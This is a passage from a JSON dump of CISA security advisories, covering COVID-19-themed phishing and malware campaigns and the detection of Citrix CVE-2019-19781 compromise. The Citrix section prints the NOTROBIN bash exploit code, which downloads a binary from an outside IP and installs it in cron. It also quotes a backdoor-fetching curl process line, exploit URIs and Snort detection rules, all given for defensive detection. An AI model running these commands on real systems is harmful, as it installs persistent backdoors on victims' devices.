impersonate well-known websites. Often the only way to notice malicious intent is through examining the website URL. In some circumstances, malicious cyber actors specifically customize these spoofed login webpages for the intended victim.\n\nIf the victim enters their password on the spoofed page, the attackers will be able to access the victim\u2019s online accounts, such as their email inbox. This access can then be used to acquire personal or sensitive information, or to further disseminate phishing emails, using the victim\u2019s address book.\n\n## Phishing for malware deployment\n\nA number of threat actors have used COVID-19-related lures to deploy malware. In most cases, actors craft an email that persuades the victim to open an attachment or download a malicious file from a linked website. When the victim opens the attachment, the malware is executed, compromising the victim\u2019s device.\n\nFor example, NCSC has observed various email messages that deploy the \u201cAgent Tesla\u201d keylogger malware. The email appears to be sent from Dr. Tedros Adhanom Ghebreyesus, Director-General of WHO. This email campaign began on Thursday, March 19, 2020. Another similar campaign offers thermometers and face masks to fight the epidemic. The email purports to attach images of these medical products but instead contains a loader for Agent Tesla.\n\nIn other campaigns, emails include a Microsoft Excel attachment (e.g., \u201c8651 8-14-18.xls\u201d) or contain URLs linking to a landing page that contains a button that\u2014if clicked\u2014redirects to download an Excel spreadsheet, such as \"EMR Letter.xls\u201d. In both cases, the Excel file contains macros that, if enabled, execute an embedded dynamic-link library (DLL) to install the \u201cGet2 loader\" malware. Get2 loader has been observed loading the \u201cGraceWire\u201d Trojan.\n\nThe \"TrickBot\" malware has been used in a variety of COVID-19-related campaigns. In one example, emails target Italian users with a document purporting to be information related to COVID-19 (see figure 3). The document contains a malicious macro that downloads a batch file (BAT), which launches JavaScript, which\u2014in turn\u2014pulls down the TrickBot binary, executing it on the system.\n\n\n\n##### Figure 3: Email containing malicious macro targeting Italian users[[2]](<https://www.bleepingcomputer.com/news/security/trickbot-malware-targets-italy-in-fake-who-coronavirus-emails/>)\n\nIn many cases, Trojans\u2014such as Trickbot or GraceWire\u2014will download further malicious files, such as Remote Access Trojans (RATs), desktop-sharing clients, and ransomware. In order to maximize the likelihood of payment, cybercriminals will often deploy ransomware at a time when organizations are under increased pressure. Hospitals and health organizations in the United States,[[3]](<https://securityboulevard.com/2020/03/maze-ransomware-continues-to-hit-healthcare-units-amid-coronavirus-covid-19-outbreak/>) Spain,[[4]](<https://www.computing.co.uk/news/4012969/hospitals-coronavirus-ransomware>) and across Europe[[5]](<https://www.bleepingcomputer.com/news/security/covid-19-testing-center-hit-by-cyberattack/>) have all been recently affected by ransomware incidents.\n\nAs always, individuals and organizations should be on the lookout for new and evolving lures. Both CISA[[6]](<https://www.us-cert.gov/ncas/tips/ST18-271>),[[7]](<https://www.us-cert.gov/Ransomware>) and NCSC[[8]](<https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks>) provide guidance on mitigating malware and ransomware attacks.\n\n## Exploitation of new teleworking infrastructure\n\nMany organizations have rapidly deployed new networks, including VPNs and related IT infrastructure, to shift their entire workforce to teleworking.\n\nMalicious cyber actors are taking advantage of this mass move to telework by exploiting a variety of publicly known vulnerabilities in VPNs and other remote working tools and software. In several examples, CISA and NCSC have observed actors scanning for publicly known vulnerabilities in Citrix. Citrix vulnerability, CVE-2019-19781, and its exploitation have been widely reported since early January 2020. Both CISA[[9]](<https://www.us-cert.gov/ncas/alerts/aa20-031a>) and NCSC[[10]](<https://www.ncsc.gov.uk/news/citrix-alert>) provide guidance on CVE-2019-19781 and continue to investigate multiple instances of this vulnerability's exploitation.\n\nSimilarly, known vulnerabilities affecting VPN products from Pulse Secure, Fortinet, and Palo Alto continue to be exploited. CISA provides guidance on the Pulse Secure vulnerability[[11]](<https://www.us-cert.gov/ncas/alerts/aa20-010a>) and NCSC provides guidance on the vulnerabilities in Pulse Secure, Fortinet, and Palo Alto.[[12]](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n\nMalicious cyber actors are also seeking to exploit the increased use of popular communications platforms\u2014such as Zoom or Microsoft Teams\u2014by sending phishing emails that include malicious files with names such as \u201czoom-us-zoom_##########.exe\u201d and \u201cmicrosoft-teams_V#mu#D_##########.exe\u201d (# representing various digits that have been reported online).[[13]](<https://blog.checkpoint.com/2020/03/30/covid-19-impact-cyber-criminals-target-zoom-domains/>) CISA and NCSC have also observed phishing websites for popular communications platforms. In addition, attackers have been able to hijack teleconferences and online classrooms that have been set up without security controls (e.g., passwords) or with unpatched versions of the communications platform software.[[14]](<https://www.fbi.gov/contact-us/field-offices/boston/news/press-releases/fbi-warns-of-teleconferencing-and-online-classroom-hijacking-during-covid-19-pandemic>)\n\nThe surge in teleworking has also led to an increase in the use of Microsoft\u2019s Remote Desktop Protocol (RDP). Attacks on unsecured RDP endpoints (i.e., exposed to the internet) are widely reported online,[[15]](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>) and recent analysis[[16]](<https://blog.reposify.com/127-increase-in-exposed-rdps-due-to-surge-in-remote-work>) has identified a 127% increase in exposed RDP endpoints. The increase in RDP use could potentially make IT systems\u2014without the right security measures in place\u2014more vulnerable to attack.[[17]](<https://www.us-cert.gov/ncas/tips/ST18-001>)\n\n## Indicators of compromise\n\nCISA and NCSC are working with law enforcement and industry partners to disrupt or prevent these malicious cyber activities and have published a non-exhaustive list of COVID-19-related IOCs via the following links:\n\n * [AA20-099A_WHITE.csv](<https://www.us-cert.gov/sites/default/files/publications/AA20-099A_WHITE.csv>)\n * [A20-099A_WHITE.stix](<https://www.us-cert.gov/sites/default/files/publications/AA20-099A_WHITE.stix.xml>)\n\nIn addition, there are a number of useful publicly available resources that provide details of COVID-19-related malicious cyber activity:\n\n * Recorded Futures\u2019 report, [_Capitalizing on Coronavirus Panic, Threat Actors Target Victims Worldwide_](<https://go.recordedfuture.com/hubfs/reports/cta-2020-0312-2.pdf>)\n * DomainTools\u2019 [_Free COVID-19 Threat List - Domain Risk Assessments for Coronavirus Threats_](<https://www.domaintools.com/resources/blog/free-covid-19-threat-list-domain-risk-assessments-for-coronavirus-threats>)\n * GitHub list of [IOCs used COVID-19-related cyberattack campaigns](<https://github.com/parthdmaniar/coronavirus-covid-19-SARS-CoV-2-IoCs>) gathered by GitHub user Parth D. Maniar\n * GitHub list of [Malware, spam, and phishing IOCs that involve the use of COVID-19 or coronavirus](<https://github.com/sophoslabs/covid-iocs>) gathered by SophosLabs\n * Reddit master thread to collect [intelligence relevant to COVID-19 malicious cyber threat actor campaigns](<https://www.reddit.com\\\\r\\\\blueteamsec\\\\comments\\\\fiy0i8\\\\master_thread_covid19corona_threat_actor_campaigns\\\\>)\n * Tweet regarding the MISP project\u2019s dedicated [#COVID2019 MISP instance](<https://twitter.com/MISPProject/status/1239864641993551873>) to share COVID-related cyber threat information\n\n### Mitigations\n\nMalicious cyber actors are continually adjusting their tactics to take advantage of new situations, and the COVID-19 pandemic is no exception. Malicious cyber actors are using the high appetite for COVID-19-related information as an opportunity to deliver malware and ransomware, and to steal user credentials. Individuals and organizations should remain vigilant. For information regarding the COVID-19 pandemic, use trusted resources, such as the Centers for Disease Control and Prevention (CDC)\u2019s [COVID-19 Situation Summary](<https://www.cdc.gov/coronavirus/2019-ncov/cases-updates/summary.html?CDC_AA_refVal=https%3A%2F%2Fwww.cdc.gov%2Fcoronavirus%2F2019-ncov%2Fsummary.html>).\n\nFollowing the CISA and NCSC advice set out below will help mitigate the risk to individuals and organizations from malicious cyber activity related to both COVID-19 and other themes:\n\n * [CISA guidance for defending against COVID-19 cyber scams](<https://www.us-cert.gov/ncas/current-activity/2020/03/06/defending-against-covid-19-cyber-scams>)\n * [CISA Insights: Risk Management for Novel Coronavirus (COVID-19)](<https://www.cisa.gov/sites/default/files/publications/20_0318_cisa_insights_coronavirus.pdf>), which provides guidance for executives regarding physical, supply chain, and cybersecurity issues related to COVID-19\n * [CISA Alert: Enterprise VPN Security](<https://www.us-cert.gov/ncas/alerts/aa20-073a>)\n * [CISA webpage providing a repository of the agency\u2019s COVID-19 guidance](<https://www.cisa.gov/coronavirus>)\n * [NCSC guidance to help spot, understand, and deal with suspicious messages and emails](<https://www.ncsc.gov.uk/guidance/suspicious-email-actions>)\n * [NCSC phishing guidance for organizations and cyber security professionals](<https://www.ncsc.gov.uk/guidance/phishing>)\n * [NCSC guidance on mitigating malware and ransomware attacks](<https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks>)\n * [NCSC guidance on home working](<https://www.ncsc.gov.uk/guidance/home-working>)\n * [NCSC guidance on end user device security](<https://www.ncsc.gov.uk/collection/end-user-device-security/eud-overview/vpns>)\n\n## Phishing guidance for individuals\n\nThe NCSC\u2019s [suspicious email guidance](<https://www.ncsc.gov.uk/guidance/suspicious-email-actions>) explains what to do if you've already clicked on a potentially malicious email, attachment, or link. It provides advice on who to contact if your account or device has been compromised and some of the mitigation steps you can take, such as changing your passwords. It also offers NCSC's top tips for spotting a phishing email:\n\n * **Authority **\u2013 Is the sender claiming to be from someone official (e.g., your bank or doctor, a lawyer, a government agency)? Criminals often pretend to be important people or organizations to trick you into doing what they want.\n * **Urgency **\u2013 Are you told you have a limited time to respond (e.g., in 24 hours or immediately)? Criminals often threaten you with fines or other negative consequences.\n * **Emotion **\u2013 Does the message make you panic, fearful, hopeful, or curious? Criminals often use threatening language, make false claims of support, or attempt to tease you into wanting to find out more.\n * **Scarcity **\u2013 Is the message offering something in short supply (e.g., concert tickets, money, or a cure for medical conditions)? Fear of missing out on a good deal or opportunity can make you respond quickly.\n\n## Phishing guidance for organizations and cybersecurity professionals\n\nOrganizational defenses against phishing often rely exclusively on users being able to spot phishing emails. However, organizations that widen their defenses to include more technical measures can improve resilience against phishing attacks.\n\nIn addition to educating users on defending against these attacks, organizations should consider NCSC\u2019s guidance that splits mitigations into four layers, on which to build defenses:\n\n 1. Make it difficult for attackers to reach your users.\n 2. Help users identify and report suspected phishing emails (see CISA Tips, [Using Caution with Email Attachments](<https://www.us-cert.gov/ncas/tips/ST04-010>) and [Avoiding Social Engineering and Phishing Scams](<https://www.us-cert.gov/ncas/tips/ST04-014>)).\n 3. Protect your organization from the effects of undetected phishing emails.\n 4. Respond quickly to incidents.\n\nCISA and NCSC also recommend organizations plan for a percentage of phishing attacks to be successful. Planning for these incidents will help minimize the damage caused.\n\n## Communications platforms guidance for individuals and organizations\n\nDue to COVID-19, an increasing number of individuals and organizations are turning to communications platforms\u2014such as Zoom and Microsoft Teams\u2014 for online meetings. In turn, malicious cyber actors are hijacking online meetings that are not secured with passwords or that use unpatched software.\n\n**Tips for defending against online meeting hijacking** (Source: [FBI Warns of Teleconferencing and Online Classroom Hijacking During COVID-19 Pandemic](<https://www.fbi.gov/contact-us/field-offices/boston/news/press-releases/fbi-warns-of-teleconferencing-and-online-classroom-hijacking-during-covid-19-pandemic>), FBI press release, March 30, 2020):\n\n * Do not make meetings public. Instead, require a meeting password or use the waiting room feature and control the admittance of guests.\n * Do not share a link to a meeting on an unrestricted publicly available social media post. Provide the link directly to specific people.\n * Manage screensharing options. Change screensharing to \u201cHost Only.\u201d\n * Ensure users are using the updated version of remote access/meeting applications.\n * Ensure telework policies address requirements for physical and information security.\n\n## Disclaimers\n\n_This report draws on information derived from CISA, NCSC, and industry sources. Any findings and recommendations made have not been provided with the intention of avoiding all risks and following the recommendations will not remove all such risk. Ownership of information risks remains with the relevant system owner at all times._\n\n_CISA does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by CISA._\n\n### References\n\n[[1] CovidLock ransomware exploits coronavirus with malicious Android app. TechRepublic.com. March 17, 2020.](<https://www.techrepublic.com/article/covidlock-ransomware-exploits-coronavirus-with-malicious-android-app/>)\n\n[[2] TrickBot Malware Targets Italy in Fake WHO Coronavirus Emails. Bleeping Computer. March 6, 2020.](<https://www.bleepingcomputer.com/news/security/trickbot-malware-targets-italy-in-fake-who-coronavirus-emails/>)\n\n[[3] Maze Ransomware Continues to Hit Healthcare Units amid Coronavirus (COVID-19) Outbreak. Security Boulevard. March 19, 2020.](<https://securityboulevard.com/2020/03/maze-ransomware-continues-to-hit-healthcare-units-amid-coronavirus-covid-19-outbreak/>)\n\n[[4] Spanish hospitals targeted with coronavirus-themed phishing lures in Netwalker ransomware attacks. Computing.co.uk. March 24, 2020.](<https://www.computing.co.uk/news/4012969/hospitals-coronavirus-ransomware>)\n\n[[5] COVID-19 Testing Center Hit By Cyberattack. Bleeping Computer. March 14, 2020.](<https://www.bleepingcomputer.com/news/security/covid-19-testing-center-hit-by-cyberattack/>)\n\n[[6] CISA Tip: Protecting Against Malicious Code](<https://www.us-cert.gov/ncas/tips/ST18-271>)\n\n[[7] CISA Ransomware webpage](<https://www.us-cert.gov/Ransomware>)\n\n[[8] NCSC Guidance: Mitigating malware and ransomware attacks](<https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks>)\n\n[[9] CISA Alert: Detecting Citrix CVE-2019-19781](<https://www.us-cert.gov/ncas/alerts/aa20-031a>)\n\n[[10] NCSC Alert: Actors exploiting Citrix products vulnerability](<https://www.ncsc.gov.uk/news/citrix-alert>)\n\n[[11] CISA Alert: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://www.us-cert.gov/ncas/alerts/aa20-010a>)\n\n[[12] NCSC Alert: Vulnerabilities exploited in VPN products used worldwide](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n\n[[13] COVID-19 Impact: Cyber Criminals Target Zoom Domains. Check Point blog. March 30, 2020.](<https://blog.checkpoint.com/2020/03/30/covid-19-impact-cyber-criminals-target-zoom-domains/>)\n\n[[14] FBI Press Release: FBI Warns of Teleconferencing and Online Classroom Hijacking During COVID-19 Pandemic](<https://www.fbi.gov/contact-us/field-offices/boston/news/press-releases/fbi-warns-of-teleconferencing-and-online-classroom-hijacking-during-covid-19-pandemic>)\n\n[[15] Microsoft Security blog: Human-operated ransomware attacks: A preventable disaster. March 5, 2020. ](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>)\n\n[[16] Reposify blog: 127% increase in exposed RDPs due to surge in remote work. March 30. 2020.](<https://blog.reposify.com/127-increase-in-exposed-rdps-due-to-surge-in-remote-work>)\n\n[[17] CISA Tip: Securing Network Infrastructure Devices](<https://www.us-cert.gov/ncas/tips/ST18-001>)\n\n### Revisions\n\nApril 8, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-08T12:00:00", "type": "ics", "title": "COVID-19 Exploited by Malicious Cyber Actors", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-04-08T12:00:00", "id": "AA20-099A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-099a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-14T18:37:03", "description": "### Summary\n\nUnknown cyber network exploitation (CNE) actors have successfully compromised numerous organizations that employed vulnerable Citrix devices through a critical vulnerability known as CVE-2019-19781.[[1]](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)\n\nThough mitigations were released on the same day Citrix announced CVE-2019-19781, organizations that did not appropriately apply the mitigations were likely to be targeted once exploit code began circulating on the internet a few weeks later.\n\nCompromised systems cannot be remediated by applying software patches that were released to fix the vulnerability. Once CNE actors establish a foothold on an affected device, their presence remains even though the original attack vector has been closed.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Alert to provide tools and technologies to assist with detecting the presence of these CNE actors. Unpatched systems and systems compromised before the updates were applied remain susceptible to exploitation.\n\nContact [CISA](<https://www.us-cert.gov/report>), or the [FBI](<https://www.fbi.gov/contact-us/field-offices/field-offices>) to report an intrusion or to request assistance.\n\n### Technical Details\n\n## Detection\n\nCISA has developed the following procedures for detecting a CVE-2019-19781 compromise. \n\n#### HTTP Access and Error Log Review\n\n**Context:** Host Hunt\n\n**Type:** Methodology\n\nThe impacted Citrix products utilize Apache for web server software, and as a result, HTTP access and error logs should be available on the system for review in `/var/log`. Log files `httpaccess.log` and `httperror.log` should both be reviewed for the following Uniform Resource Identifiers (URIs), found in the proof of concept exploit that was released.\n\n * `'*/../vpns/*'`\n * `'*/vpns/cfg/smb.conf'`\n * `'*/vpns/portal/scripts/newbm.pl*'`\n * `'*/vpns/portal/scripts/rmbm.pl*'`\n * `'*/vpns/portal/scripts/picktheme.pl*'`\n\nNote: These URIs were observed in Security Information and Event Management detection content provided by <https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml>.[[2]](<https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml>)\n\nPer TrustedSec, a sign of successful exploitation would be a `POST` request to a URI containing `/../` or `/vpn`, followed by a GET request to an XML file. If any exploitation activity exists\u2014attempted or successful\u2014analysts should be able to identify the attacking Internet Protocol address(es). Tyler Hudak\u2019s blog provided sample logs indicating what a successful attack would look like.[[3]](<https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/>)\n\n`10.1.1.1 - - [10/Jan/2020:13:23:51 +0000] \"POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1\" 200 143 \"https://10.1.1.2/\" \"USERAGENT \"`\n\n`10.1.1.1 - - [10/Jan/2020:13:23:53 +0000] \"GET /vpn/../vpns/portal/backdoor.xml HTTP/1.1\" 200 941 \"-\" \"USERAGENT\"`\n\nAdditionally, FireEye provided the following `grep` commands to assist with log review and help to identify suspicious activity.[[4]](<https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html>)\n\n`grep -iE 'POST.*\\.pl HTTP/1\\.1\\\" 200 ' /var/log/httpaccess.log -A 1`\n\n`grep -iE 'GET.*\\.xml HTTP/1\\.1\\\" 200' /var/log/httpaccess.log -B 1`\n\n#### Running Processes Review\n\n**Context:** Host Hunt\n\n**Type:** Methodology\n\nReviewing the running processes on a system suspected of compromise for processes running under the `nobody `user can identify potential backdoors.\n\n`ps auxd | grep nobody`\n\nAnalysts should review the `ps` output for suspicious entries such as this:\n\n`nobody 63390 0.0 0.0 8320 16 ?? I 1:35PM 0:00.00 | | `\u2013 sh -c uname & curl -o \u2013 http://10.1.1.2/backdoor`\n\nFurther pivoting can be completed using the Process ID from the PS output:\n\n`lsof -p <pid>`\n\nDue to the nature of this exploit, it is likely that any processes related to a backdoor would be running under the `httpd` process.\n\n### Checking for NOTROBIN Presence\n\n**Context: **Host Hunt\n\n**Type:** Methodology\n\n`pkill -9 netscalerd; rm /var/tmp/netscalerd; mkdir /tmp/.init; curl -k`\n\n`hxxps://95.179.163[.]186/wp-content/uploads/2018/09/64d4c2d3ee56af4f4ca8171556d50faa -o`\n\n`/tmp/.init/httpd; chmod 744 /tmp/.init/httpd; echo \"* * * * *`\n\n`/var/nstmp/.nscache/httpd\" | crontab -; /tmp/.init/httpd &\"`\n\nThe above is the NOTROBIN Bash exploit code. To check for NOTROBIN Presence, analysts should look for the staging directory at `/tmp/.init` as well as `httpd` processes running as a cron job.\n\nRunning the command `find / -name \".init\" 2> /tmp/error.log` should return the path to the created staging directory while taking all of the errors and creating a file located at `/tmp/error.log`.\n\n### Additional /var/log Review\n\n**Context:** Host Hunt\n\n**Type:** Methodology\n\nAnalysts should focus on reviewing the following logs in `/var/log` on the Citrix device, if available. The underlying operating system is based on FreeBSD, and the logs are similar to what would be found on a Linux system. Analysts should focus on log entries related to the `nobody` user or `(null) on` and should try to identify any suspicious commands that may have been run, such as `whoami` or `curl`. Please keep in mind that logs are rotated and compressed, and additional activity may be found in the archives (.gz files) for each log.\n\n**bash.log**\n\nSample Log Entry:\n\n`Jan 10 13:35:47`\n\n`<local7.notice> ns bash[63394]: nobody on /dev/pts/3`\n\n`shell_command=\"hostname\"`\n\nNote: The bash log can provide the user (`nobody`), command (`hostname`), and process id (`63394`) related to the nefarious activity.\n\n**sh.log**\n\n**notice.log**\n\n### Check Crontab for Persistence\n\n**Context:** Host Hunt\n\n**Type: **Methodology\n\nAs with running processes and log entries, any cron jobs created by the user `nobody` are a cause for concern and likely related to a persistence mechanism established by an attacker. Additionally, search for a `httpd` process within the crontab to determine if a system has been affected by NOTROBIN. Analysts can review entries on a live system using the following command:\n\n`crontab -l -u nobody`\n\n### Existence of Unusual Files\n\n**Context:** Host Hunt\n\n**Type:** Methodology\n\nOpen-source outlets have reported that during incident response activities, attackers exploiting this vulnerability have been placing malicious files in the following directories. Analysts should review file listings for these directories and determine if any suspicious files are present on the server.\n\n * `/netscaler/portal/templates`\n * `/var/tmp/netscaler/portal/templates`\n\n### Snort Alerts\n\n**Context: **Network Alert\n\n**Type: **Signatures\n\nAlthough most activity related to exploitation of the Citrix vulnerability would use SSL, FireEye noted that an HTTP scanner is available to check for the vulnerability. The following Snort rules were provided in FireEye\u2019s blog post and would likely indicate a vulnerable Citrix server.[5] These rules should be tuned for the environment and restricted to the IP addresses of the Citrix server(s) to reduce potential false positives.\n\n`alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:\"Potential CVE-2019-19781 vulnerable .CONF response\"; flow:established,to_client; content:\"HTTP/1.\"; depth:7; content:\"200 OK\"; distance:1; content:\"|0d0a|Server: Apache\"; distance:0; content:\"al]|0d0a|\"; distance:0; content:\"encrypt passwords\"; distance:0; content:\"name resolve order\"; reference:cve,2019-19781; reference:url,https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html; sid:201919781; rev:1;)`\n\n`alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:\"Potential CVE-2019-19781 vulnerable .PL response\"; flow:established,to_client; content:\"HTTP/1.\"; depth:7;`\n\n`content:\"200 OK\"; distance:1; content:\"|0d0a|Server: Apache\"; distance:0; `\n\n`content:\"|0d0a|Connection: Keep-Alive\"; `\n\n`content:\"|0d0a0d0a3c48544d4c3e0a3c424f44593e0a3c534352495054206c616e67756167653d6`\n\n`a61766173637269707420747970653d746578742f6a6176617363726970743e0a2f2f706172656e74`\n\n`2e77696e646f772e6e735f72656c6f616428293b0a77696e646f772e636c6f736528293b0a3c2f534`\n\n`3524950543e0a3c2f424f44593e0a3c2f48544d4c3e0a|\"; reference:cve,2019-19781; reference:url,https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html; sid:201919781; rev:1;)`\n\n### Suspicious Network Traffic\n\n**Context:** Network Hunt\n\n**Type: **Methodology\n\nFrom a network perspective, this vulnerability will likely not be detectable, given that the traffic will likely be encrypted (SSL). Additionally, due to where they sit on networks, devices such as these are typically not covered in traditional network monitoring and ingress traffic to the device may not be part of a normal SPAN port configuration. In the event network monitoring is available and attackers are using HTTP versions of this exploit, CISA recommends looking for URIs containing `/../` or `/vpns/` to identify potentially malicious activity. It is also worth surveying the traffic for any requests to .xml files or perl (.pl) files as well, as this would not be consistent with normal Citrix web activity. As with the web logs, analysts would be looking for a successful `POST` request followed by a successful `GET` request with the aforementioned characteristics.\n\nGiven that a compromise occurred, activity to look for would be outbound traffic from the Citrix server, both to internal and external hosts. In theory, if an attacker placed a backdoor on the system, it should be connecting outbound to a command and control server. This traffic would most likely be anomalous (outbound TCP Port 80 or 443), given that one would only expect to see inbound TCP/443 traffic to the Citrix server as normal activity. If an attacker is leveraging a Citrix device as an entry point to an organization, anomalous internal traffic could potentially be visible in bro data such as scanning, file transfers, or lateral movement. An exception to internal traffic is that the Citrix ADC device is much more than just an SSL VPN device and is used for multiple types of load balancing. As a result, an ADC device may be communicating with internal systems legitimately (web servers, file servers, custom applications, etc.).\n\n**Inbound Exploitation Activity (Suspicious URIs)**\n\n`index=bro dest=<CITRIX_IP_ADDR> sourcetype=bro_http uri=*/../* OR uri=*/vpn* OR uri=*.pl OR uri=*.xml`\n\n**Outbound Traffic Search (Backdoor C2)**\n\n`index=bro sourcetype=bro_conn src=<CITRIX_IP_ADDR> dest!=<INTERNAL_NET>`\n\n`| stats count by src dest dest_port`\n\n`| sort -count`\n\nThe following resources provide additional detection measures.\n\n * Citrix and FireEye Mandiant released an IOC scanning tool for CVE-2019-19781.[[6]](<https://github.com/citrix/ioc-scanner-CVE-2019-19781/>) The tool aids customers with detecting potential IOCs based on known attacks and exploits.\n * The National Security Agency released a Cybersecurity Advisory on CVE-2019-19781 with additional detection measures.[[7]](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n * CISA released a utility that enables users and administrators to detect whether their Citrix ADC and Citrix Gateway firmware is susceptible to CVE-2019-19781.[[8]](<https://github.com/cisagov/check-cve-2019-19781>)\n\n## Impact\n\nCVE-2019-19781 is an arbitrary code execution vulnerability that has been detected in exploits in the wild. An attacker can exploit this vulnerability to take control of an affected system.\n\nThe vulnerability affects the following appliances:\n\n * Citrix NetScaler ADC and NetScaler Gateway version 10.5 \u2013 all supported builds before 10.5.70.12\n * Citrix ADC and NetScaler Gateway version 11.1 \u2013 all supported builds before 11.1.63.15\n * Citrix ADC and NetScaler Gateway version 12.0 \u2013 all supported builds before 12.0.63.13\n * Citrix ADC and NetScaler Gateway version 12.1 \u2013 all supported builds before 12.1.55.18\n * Citrix ADC and Citrix Gateway version 13.0 \u2013 all supported builds before 13.0.47.24\n * Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO \u2013 all supported software release builds before 10.2.6b and 11.0.3b. (Citrix SD-WAN WANOP is vulnerable because it packages Citrix ADC as a load balancer).\n\n### Mitigations\n\nThe resources provided include steps for standalone, HA pairs, and clustered Citrix instances.\n\n * Use Citrix's tool to check for the vulnerability. \n * <https://support.citrix.com/article/CTX269180>\n * Use an open-source utility to check for the vulnerability or previous device compromise. \n * <https://github.com/cisagov/check-cve-2019-19781>_ _\n * <https://github.com/x1sec/citrixmash_scanner>\n * <https://github.com/fireeye/ioc-scanner-CVE-2019-19781/releases/tag/v1.2>\n * Follow instructions from Citrix to mitigate the vulnerability. \n * <https://support.citrix.com/article/CTX267679>\n * <https://support.citrix.com/article/CTX267027>\n * Upgrade firmware to a patched version. \n * Subscribe to Citrix Alerts for firmware updates. \n * <https://support.citrix.com/user/alerts>\n * Patch devices to the most current version. \n * <https://www.citrix.com/downloads/citrix-gateway/>\n * <https://www.citrix.com/downloads/citrix-adc/>\n * <https://www.citrix.com/downloads/citrix-sd-wan/>\n\nConsider deploying a VPN capability using standardized protocols, preferably ones listed on the National Information Assurance Partnership (NIAP) Product Compliant List (PCL), in front of publicly accessible gateway appliances to require user authentication for the VPN before being able to reach these appliances.\n\nCISA's Tip [Handling Destructive Malware](<https://www.us-cert.gov/ncas/tips/ST13-003>) provides additional information, including best practices and incident response strategies.\n\n### References\n\n[[1] Citrix blog: Citrix releases final fixes for CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)\n\n[[2] GitHub web_citrix_cve_2019_19781_exploit.yml ](<https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml>)\n\n[[3] TrustedSec blog: NetScaler Remote Code Execution Forensics](<https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/>)\n\n[[4] FireEye blog: Rough Patch: I Promise It'll Be 200 OK (Citrix ADC CVE-2019-19781)](<https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html>)\n\n[[5] FireEye blog: Rough Patch: I Promise It'll Be 200 OK (Citrix ADC CVE-2019-19781)](<https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html>)\n\n[[6] IOC scanning tool for CVE-2019-19781](<https://github.com/citrix/ioc-scanner-CVE-2019-19781/>)\n\n[[7] NSA Cybersecurity Advisory: Mitigate CVE-2019-19781: Critical Vulnerability](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n\n[[8] CISA Vulnerability Test Tool](<https://github.com/cisagov/check-cve-2019-19781>)\n\n### Revisions\n\nJanuary 31, 2020: Initial Version|February 7, 2020: Added link to the Australian Cyber Security Centre script\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-21T12:00:00", "type": "ics", "title": "Detecting Citrix CVE-2019-19781", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 